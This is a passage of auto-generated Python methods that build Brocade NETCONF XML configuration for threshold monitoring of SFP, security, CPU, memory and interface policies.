area_value = ET.SubElement(area, "area_value")
area_value.text = kwargs.pop('area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
high_threshold = ET.SubElement(threshold, "high-threshold")
high_threshold.text = kwargs.pop('high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
low_threshold = ET.SubElement(threshold, "low-threshold")
low_threshold.text = kwargs.pop('low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
buffer = ET.SubElement(threshold, "buffer")
buffer.text = kwargs.pop('buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_above_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_highthresh_action = ET.SubElement(above, "above-highthresh-action")
above_highthresh_action.text = kwargs.pop('above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_highthresh_action = ET.SubElement(below, "below-highthresh-action")
below_highthresh_action.text = kwargs.pop('below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_lowthresh_action = ET.SubElement(below, "below-lowthresh-action")
below_lowthresh_action.text = kwargs.pop('below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
apply = ET.SubElement(security, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
pause = ET.SubElement(security, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_sec_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name = ET.SubElement(policy, "sec_policy_name")
sec_policy_name.text = kwargs.pop('sec_policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_sec_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value = ET.SubElement(area, "sec_area_value")
sec_area_value.text = kwargs.pop('sec_area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_timebase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
timebase = ET.SubElement(area, "timebase")
timebase.text = kwargs.pop('timebase')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_high_threshold = ET.SubElement(threshold, "sec-high-threshold")
sec_high_threshold.text = kwargs.pop('sec_high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_low_threshold = ET.SubElement(threshold, "sec-low-threshold")
sec_low_threshold.text = kwargs.pop('sec_low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_buffer = ET.SubElement(threshold, "sec-buffer")
sec_buffer.text = kwargs.pop('sec_buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_above_sec_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
sec_above_highthresh_action = ET.SubElement(above, "sec-above-highthresh-action")
sec_above_highthresh_action.text = kwargs.pop('sec_above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
sec_below_highthresh_action = ET.SubElement(below, "sec-below-highthresh-action")
sec_below_highthresh_action.text = kwargs.pop('sec_below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
sec_below_lowthresh_action = ET.SubElement(below, "sec-below-lowthresh-action")
sec_below_lowthresh_action.text = kwargs.pop('sec_below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_poll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
poll = ET.SubElement(Cpu, "poll")
poll.text = kwargs.pop('poll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
retry = ET.SubElement(Cpu, "retry")
retry.text = kwargs.pop('retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
limit = ET.SubElement(Cpu, "limit")
limit.text = kwargs.pop('limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_actions(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
actions = ET.SubElement(Cpu, "actions")
actions.text = kwargs.pop('actions')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_poll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
poll = ET.SubElement(Memory, "poll")
poll.text = kwargs.pop('poll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
retry = ET.SubElement(Memory, "retry")
retry.text = kwargs.pop('retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
limit = ET.SubElement(Memory, "limit")
limit.text = kwargs.pop('limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_high_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
high_limit = ET.SubElement(Memory, "high-limit")
high_limit.text = kwargs.pop('high_limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_low_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
low_limit = ET.SubElement(Memory, "low-limit")
low_limit.text = kwargs.pop('low_limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_actions(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
actions = ET.SubElement(Memory, "actions")
actions.text = kwargs.pop('actions')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
apply = ET.SubElement(interface, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
pause = ET.SubElement(interface, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name = ET.SubElement(policy, "policy_name")
policy_name.text = kwargs.pop('policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
type = ET.SubElement(area, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value = ET.SubElement(area, "area_value")
area_value.text = kwargs.pop('area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_timebase_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
timebase_value = ET.SubElement(threshold, "timebase_value")
timebase_value.text = kwargs.pop('timebase_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
high_threshold = ET.SubElement(threshold, "high-threshold")
high_threshold.text = kwargs.pop('high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
low_threshold = ET.SubElement(threshold, "low-threshold")
low_threshold.text = kwargs.pop('low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
buffer = ET.SubElement(threshold, "buffer")
buffer.text = kwargs.pop('buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_highthresh_action = ET.SubElement(above, "above-highthresh-action")
above_highthresh_action.text = kwargs.pop('above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_lowthresh_action = ET.SubElement(above, "above-lowthresh-action")
above_lowthresh_action.text = kwargs.pop('above_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_highthresh_action = ET.SubElement(below, "below-highthresh-action")
below_highthresh_action.text = kwargs.pop('below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
